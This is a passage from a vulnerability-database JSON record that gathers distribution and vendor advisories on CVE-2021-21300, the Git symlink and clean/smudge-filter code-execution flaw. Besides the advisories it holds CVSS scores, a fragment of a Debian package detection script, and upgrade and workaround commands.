'1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'git-svn', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'gitk', 'reference': '1:2.20.1-2+deb10u4'},\n {'release': '10.0', 'prefix': 'gitweb', 'reference': '1:2.20.1-2+deb10u4'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git / git-all / git-cvs / git-daemon-run / git-daemon-sysvinit / etc');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-07-28T14:46:52", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T19:59:22", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: git-2.26.3-2.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-15T19:59:22", "id": "FEDORA:1FF2630A3E60", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LMXX2POK5X576BSDWSXGU7EIK6I72ERU/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:52", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T23:39:07", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: git-2.30.2-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-11T23:39:07", "id": "FEDORA:5BF0F30E1976", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/LCLJJLKKMS5WRFO6C475AOUZTWQLIARX/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:52", "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-19T20:31:57", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: git-2.30.2-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-19T20:31:57", "id": "FEDORA:279513049383", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BBPNGLQSYJHLZZ37BO42YY6S5OTIF4L4/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-03-17T02:34:32", "description": "Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mscve", "title": "Git for Visual Studio Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-09T08:00:00", "id": "MS:CVE-2021-21300", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-21300", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T18:59:32", "description": "### Background\n\nGit is a distributed version control system designed.\n\n### Description\n\nIt was discovered that Git could be fooled into running remote code during a clone on case-insensitive file systems with support for symbolic links, if Git is configured globally to apply delay-capable clean/smudge filters (such as Git LFS). \n\n### Impact\n\nA remote attacker could entice a user to clone a specially crafted repository, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Git users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/git-2.26.3\"", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "gentoo", "title": "Git: User-assisted execution of arbitrary code", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-04-30T00:00:00", "id": "GLSA-202104-01", "href": "https://security.gentoo.org/glsa/202104-01", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-03-08T02:17:58", "description": "A flaw was found in git, in which a specially-crafted repository that contains a symbolic link may cause just-checked out script to be executed while cloning.\n#### Mitigation\n\nIf symbolic link support is disabled in Git (e.g. via git config --global core.symlinks false), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. before cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. \n\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-10T03:29:12", "type": "redhatcve", "title": "CVE-2021-21300", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2023-03-07T23:54:21", "id": "RH:CVE-2021-21300", "href": "https://access.redhat.com/security/cve/cve-2021-21300", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:55", "description": "Arch Linux Security Advisory ASA-202103-3\n=========================================\n\nSeverity: Low\nDate : 2021-03-13\nCVE-ID : CVE-2021-21300\nPackage : git\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1665\n\nSummary\n=======\n\nThe package git before version 2.30.2-1 is vulnerable to arbitrary code\nexecution.\n\nResolution\n==========\n\nUpgrade to 2.30.2-1.\n\n# pacman -Syu \"git>=2.30.2-1\"\n\nThe problem has been fixed upstream in version 2.30.2.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIn affected versions of Git a specially crafted repository that\ncontains symbolic links as well as files using a clean/smudge filter\nsuch as Git LFS, may cause just-checked out script to be executed while\ncloning onto a case-insensitive file system such as NTFS, HFS+ or APFS.\nNote that clean/smudge filters have to be configured for that. As a\nworkaround, if symbolic link support is disabled in Git (e.g. via `git\nconfig --global core.symlinks false`), the described attack won't work.\nLikewise, if no clean/smudge filters such as Git LFS are configured\nglobally (i.e. _before_ cloning), the attack is foiled. As always, it\nis best to avoid cloning repositories from untrusted sources. The\nearliest impacted version is 2.14.2. The fix versions are: 2.30.1,\n2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4,\n2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.\n\nImpact\n======\n\nUnder certain circumstances, a remote attacker might be able to execute\narbitrary code by getting a local user to clone a crafted repository.\n\nReferences\n==========\n\nhttps://github.com/git/git/security/advisories/GHSA-8prw-h3cq-mghm\nhttps://lore.kernel.org/git/xmqqim6019yd.fsf@gitster.c.googlers.com/\nhttps://git.kernel.org/pub/scm/git/git.git/commit/?id=684dd4c2b414bcf648505e74498a608f28de4592\nhttps://security.archlinux.org/CVE-2021-21300", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-13T00:00:00", "type": "archlinux", "title": "[ASA-202103-3] git: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-13T00:00:00", "id": "ASA-202103-3", "href": "https://security.archlinux.org/ASA-202103-3", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:06:27", "description": "Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T20:15:00", "type": "cve", "title": "CVE-2021-21300", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-12-06T21:38:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:34", "cpe:/a:git-scm:git:2.27.0", "cpe:/a:git-scm:git:2.14.2", "cpe:/o:fedoraproject:fedora:33", "cpe:/a:git-scm:git:2.28.0", "cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2021-21300", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21300", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.27.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.28.0:*:*:*:*:*:*:*"]}], "cloudfoundry": [{"lastseen": "2021-08-11T17:37:55", "description": "## Severity\n\nMedium\n\n## Vendor\n\nCanonical Ubuntu\n\n## Versions Affected\n\n * Canonical Ubuntu 16.04\n * Canonical Ubuntu 18.04\n\n## Description\n\nMatheus Tavares discovered that Git incorrectly handled delay-capable clean/smudge filters when being used on case-insensitive filesystems. A remote attacker could possibly use this issue to execute arbitrary code.\n\nCVEs contained in this USN include: CVE-2021-21300.\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * cflinuxfs3 \n * All versions prior to 0.229.0\n * CF Deployment \n * All versions prior to 16.7.0\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases:\n\n * cflinuxfs3 \n * Upgrade all versions to 0.229.0 or greater\n * CF Deployment \n * Upgrade all versions to 16.7.0 or greater\n\n## References\n\n * [USN Notice](<https://usn.ubuntu.com/4761-1/>)\n * [CVE-2021-21300](<https://people.canonical.com/~ubuntu-security/cve/CVE-2021-21300>)\n\n## History\n\n2021-03-22: Initial vulnerability report published.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T00:00:00", "type": "cloudfoundry", "title": "USN-4761-1: Git vulnerability | Cloud Foundry", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-22T00:00:00", "id": "CFOUNDRY:26E443794B9C5844AA3512A6DC376DA3", "href": "https://www.cloudfoundry.org/blog/usn-4761-1/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-01-26T15:26:41", "description": "## Releases\n\n * Ubuntu 20.10 \n * Ubuntu 20.04 LTS\n * Ubuntu 18.04 LTS\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * git \\- fast, scalable, distributed revision control system\n\nMatheus Tavares discovered that Git incorrectly handled delay-capable \nclean/smudge filters when being used on case-insensitive filesystems. A \nremote attacker could possibly use this issue to execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "ubuntu", "title": "Git vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-09T00:00:00", "id": "USN-4761-1", "href": "https://ubuntu.com/security/notices/USN-4761-1", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2021-07-24T16:14:49", "description": "", "cvss3": {}, "published": "2021-03-11T00:00:00", "type": "seebug", "title": "Git for Visual Studio\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\uff08CVE-2021-21300\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-11T00:00:00", "id": "SSV:99155", "href": "https://www.seebug.org/vuldb/ssvid-99155", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2022-11-08T06:10:38", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for git fixes the following issues:\n\n - On case-insensitive filesystems, with support for symbolic links, if Git\n is configured globally to apply delay-capable clean/smudge filters (such\n as Git LFS), Git could be fooled into running remote code during a\n clone. (bsc#1183026, CVE-2021-21300)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-405=1", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-14T00:00:00", "type": "suse", "title": "Security update for git (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2021-03-14T00:00:00", "id": "OPENSUSE-SU-2021:0405-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/33ZBSRS6RUAL5LAGWR6DDONQJXFU6FIT/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T12:40:19", "description": "An update that solves one vulnerability, contains two\n features and has two fixes is now available.\n\nDescription:\n\n This update for git fixes the following issues:\n\n Update from version 2.26.2 to version 2.31.1 (jsc#SLE-18152)\n\n Security fixes:\n\n - CVE-2021-21300: On case-insensitive file systems with support for\n symbolic links, if Git is configured globally to apply delay-capable\n clean/smudge filters (such as Git LFS), Git could run remote code during\n a clone. (bsc#1183026)\n\n Non security changes:\n\n - Add `sysusers` file to create `git-daemon` user.\n - Remove `perl-base` and `openssh-server` dependency on `git-core`and\n provide a `perl-Git` package. (jsc#SLE-17838)\n - `fsmonitor` bug fixes\n - Fix `git bisect` to take an annotated tag as a good/bad endpoint\n - Fix a corner case in `git mv` on case insensitive systems\n - Require only `openssh-clients` where possible (like Tumbleweed or SUSE\n Linux Enterprise >= 15 SP3). (bsc#1183580)\n - Drop `rsync` requirement, not necessary anymore.\n - Use of `pack-redundant` command is discouraged and will trigger a\n warning. The replacement is `repack -d`.\n - The `--format=%(trailers)` mechanism gets enhanced to make it easier to\n design output for machine consumption.\n - No longer give message to choose between rebase or merge upon pull if\n the history `fast-forwards`.\n - The configuration variable `core.abbrev` can be set to `no` to force no\n abbreviation regardless of the hash algorithm\n - `git rev-parse` can be explicitly told to give output as absolute or\n relative path with the `--path-format=(absolute|relative)` option.\n - Bash completion update to make it easier for end-users to add completion\n for their custom `git` subcommands.\n - `git maintenance` learned to drive scheduled maintenance on platforms\n whose native scheduling methods are not 'cron'.\n - After expiring a reflog and making a single commit, the reflog for the\n branch would record a single entry that knows both `@{0}` and `@{1}`,\n but we failed to answer \"what commit were we on?\", i.e. `@{1}`\n - `git bundle` learns `--stdin` option to read its refs from the standard\n input. Also, it now does not lose refs when they point at the same\n object.\n - `git log` learned a new `--diff-merges=<how>` option.\n - `git ls-files` can and does show multiple entries when the index is\n unmerged, which is a source for confusion unless `-s/-u` option is in\n use. A new option `--deduplicate` has been introduced.\n - `git worktree list` now annotates worktrees as prunable, shows locked\n and prunable attributes in `--porcelain mode`, and gained a `--verbose`\n option.\n - `git clone` tries to locally check out the branch pointed at by HEAD of\n the remote repository after it is done, but the protocol did not convey\n the information necessary to do so when copying an empty repository. The\n protocol v2 learned how to do so.\n - There are other ways than `..` for a single token to denote a `commit\n range\", namely `<rev>^!` and `<rev>^-<n>`, but `git range-diff` did not\n understand them.\n - The `git range-diff` command learned `--(left|right)-only` option to\n show only one side of the compared range.\n - `git mergetool` feeds three versions (base, local and remote) of a\n conflicted path unmodified. The command learned to optionally prepare\n these files with unconflicted parts already resolved.\n - The `.mailmap` is documented to be read only from the root level of a\n working tree, but a stray file in a bare repository also was read by\n accident, which has been corrected.\n - `git maintenance` tool learned a new `pack-refs` maintenance task.\n - Improved error message given when a configuration variable that is\n expected to have a boolean value.\n - Signed commits and tags now allow verification of objects, whose two\n object names (one in SHA-1, the other in SHA-256) are both signed.\n - `git rev-list` command learned `--disk-usage` option.\n - `git diff`, `git log` `--{skip,rotate}-to=<path>` allows the user to\n discard diff output for early paths or move them to the end of the\n output.\n - `git difftool` learned `--skip-to=<path>` option to restart an\n interrupted session from an arbitrary path.\n - `git grep` has been tweaked to be limited to the sparse checkout paths.\n - `git rebase --[no-]fork-point` gained a configuration variable\n `rebase.forkPoint` so that users do not have to keep specifying a\n non-default setting.\n - `git stash` did not work well in a sparsely checked out working tree.\n - Newline characters in the host and path part of `git://` URL are now\n forbidden.\n - `Userdiff` updates for PHP, Rust, CSS\n - Avoid administrator error leading to data loss with `git push\n --force-with-lease[=<ref>]` by introducing `--force-if-includes`\n - only pull 